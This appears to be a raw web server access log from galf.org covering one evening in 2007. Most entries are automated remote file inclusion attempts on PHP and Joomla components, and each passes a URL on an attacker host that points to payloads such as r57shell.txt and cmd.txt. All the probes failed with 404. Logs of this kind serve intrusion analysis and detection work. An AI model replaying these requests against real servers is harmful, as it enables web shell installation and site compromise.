200.57.31.22 - - [30/Sep/2007:18:27:17 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:27:17 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.79.164.220 - - [30/Sep/2007:18:27:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.79.164.220 - - [30/Sep/2007:18:27:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:18:28:20 -0700] "GET /logs/access_070910.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:18:31:01 -0700] "GET /logs/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.12.114.142 - - [30/Sep/2007:18:31:01 -0700] "GET /index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.193.248.204 - - [30/Sep/2007:18:31:44 -0700] "GET /logs/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.193.248.204 - - [30/Sep/2007:18:31:45 -0700] "GET /index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
209.62.7.50 - - [30/Sep/2007:18:32:07 -0700] "GET /logs/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.62.7.50 - - [30/Sep/2007:18:32:07 -0700] "GET /index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
62.149.196.76 - - [30/Sep/2007:18:33:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:18:33:23 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.246.99.64 - - [30/Sep/2007:18:34:18 -0700] "GET /logs/index.php?get=http://www.scupank.org/c.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.99.64 - - [30/Sep/2007:18:34:19 -0700] "GET /index.php?get=http://www.scupank.org/c.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:34:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:34:21 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:34:52 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:34:54 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.249.44.92 - - [30/Sep/2007:18:34:57 -0700] "GET /logs/access_070910.log/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:18:34:57 -0700] "GET /index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:18:34:58 -0700] "GET /logs/index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.98.81.5 - - [30/Sep/2007:18:36:07 -0700] "GET /logs/index.php?get=http://ngaycuoithang2.com/taipt/g3data/smarty/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
217.98.81.5 - - [30/Sep/2007:18:36:08 -0700] "GET /index.php?get=http://ngaycuoithang2.com/taipt/g3data/smarty/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:36:19 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.90.201 - - [30/Sep/2007:18:36:19 -0700] "GET /logs/access_070716.log/index.php?x=http://www.buxombombardiers.com/modules/vwar/images/locations/sc? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:18:37:26 -0700] "GET /logs/index.php?get=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
202.60.80.10 - - [30/Sep/2007:18:37:27 -0700] "GET /index.php?get=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:39:04 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:39:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.180.243.82 - - [30/Sep/2007:18:39:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:42:40 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:42:40 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.33.227.4 - - [30/Sep/2007:18:42:52 -0700] "GET /logs/index.php?get=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
196.33.227.4 - - [30/Sep/2007:18:42:53 -0700] "GET /index.php?get=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:44:08 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:44:14 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:44:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:18:44:55 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:18:44:55 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:18:45:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:18:46:04 -0700] "GET /logs/access.log/index.php?inc=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:18:46:04 -0700] "GET /index.php?inc=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:18:46:05 -0700] "GET /logs/index.php?inc=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:18:46:27 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:18:46:28 -0700] "GET /index.php?pag=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:18:46:28 -0700] "GET /logs/index.php?pag=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
84.53.97.25 - - [30/Sep/2007:18:46:30 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.53.97.25 - - [30/Sep/2007:18:46:30 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.27.33 - - [30/Sep/2007:18:47:20 -0700] "GET /logs/access_070826.log//modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:48:20 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:48:23 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:18:48:31 -0700] "GET /logs/access_070723.log/index.php?con=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:18:48:32 -0700] "GET /index.php?con=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:18:48:32 -0700] "GET /logs/index.php?con=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:48:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:48:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.235.184.41 - - [30/Sep/2007:18:50:49 -0700] "GET /logs/access.log/index.php?pag=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:51:01 -0700] "GET /logs/access_070716.log/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:51:08 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:51:16 -0700] "GET /logs/access_070716.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:51:23 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:51:28 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:52:50 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:52:51 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:52:54 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:52:56 -0700] "GET /logs/access.log/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:52:58 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:53:39 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:55:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:55:48 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:55:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:55:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:18:55:54 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:18:56:18 -0700] "GET /logs/access_070716.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:18:56:18 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:18:56:19 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.101 - - [30/Sep/2007:18:58:29 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:37 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.57.31.22 - - [30/Sep/2007:18:58:38 -0700] "GET /logs/access_070910.log/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:42 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:42 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:44 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:45 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:58:50 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:59:14 -0700] "GET /logs/access.log/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:18:59:58 -0700] "GET /logs/access_070618.log//components/com_simpleboard/image_upload.php?sbp=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:19:00:07 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://watchout.by.ru/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:19:00:13 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:19:00:18 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://watchout.by.ru/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:19:00:24 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:19:01:06 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:01:57 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:19:04:18 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:19:04:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:04:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:04:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:19:05:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:19:05:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:05:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:19:05:31 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:06:59 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:19:07:00 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.57.31.22 - - [30/Sep/2007:19:07:01 -0700] "GET /logs/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.57.31.22 - - [30/Sep/2007:19:07:02 -0700] "GET /index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.53.97.25 - - [30/Sep/2007:19:07:07 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.141.39.206 - - [30/Sep/2007:19:07:56 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:19:08:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.180.243.82 - - [30/Sep/2007:19:08:06 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.180.243.82 - - [30/Sep/2007:19:08:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.180.243.82 - - [30/Sep/2007:19:08:07 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:19:08:09 -0700] "GET /logs/access_070806.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:19:08:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:19:08:13 -0700] "GET //skin/zero_vote/error.php?dir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
84.53.97.25 - - [30/Sep/2007:19:08:58 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:19:09:20 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:19:09:20 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:10:08 -0700] "GET /logs/access_070910.log/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:19:10:29 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:19:11:24 -0700] "GET /template.php?pagina=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.235.184.41 - - [30/Sep/2007:19:11:30 -0700] "GET /logs/access_070910.log/index.php?inc=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:13:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:13:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.197.203 - - [30/Sep/2007:19:14:33 -0700] "GET /logs/index2.php?url_page=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.59.197.203 - - [30/Sep/2007:19:14:33 -0700] "GET /index2.php?url_page=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:19:15:21 -0700] "GET /index.php?get=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:15:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:19:15:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:19:17:25 -0700] "GET /logs/announcements.php?phpraid_dir=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:19:17:25 -0700] "GET /announcements.php?phpraid_dir=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:17:40 -0700] "GET /logs/access_070910.log/index1.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
